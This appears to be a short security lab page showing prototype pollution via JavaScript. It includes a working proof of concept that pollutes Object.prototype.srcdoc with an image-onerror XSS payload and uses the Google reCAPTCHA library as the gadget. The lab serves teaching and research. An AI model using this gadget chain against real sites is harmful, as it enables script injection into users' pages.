Prototype Pollution Lab


You should see an alert box popping up. This time the prototype is polluted via JS. Gadget below is used and the library is Google Recaptcha.

<script src="https://www.google.com/recaptcha/api.js?render=6LeaqxYbAAAAAF_-OJc1v8VAuRgMg8sK-SRwVAUQ"></script>
<script>
  Object.prototype.srcdoc=['<img src onerror=alert(document.domain)>']
</script>

Writeup & Vulnerable Code Snippet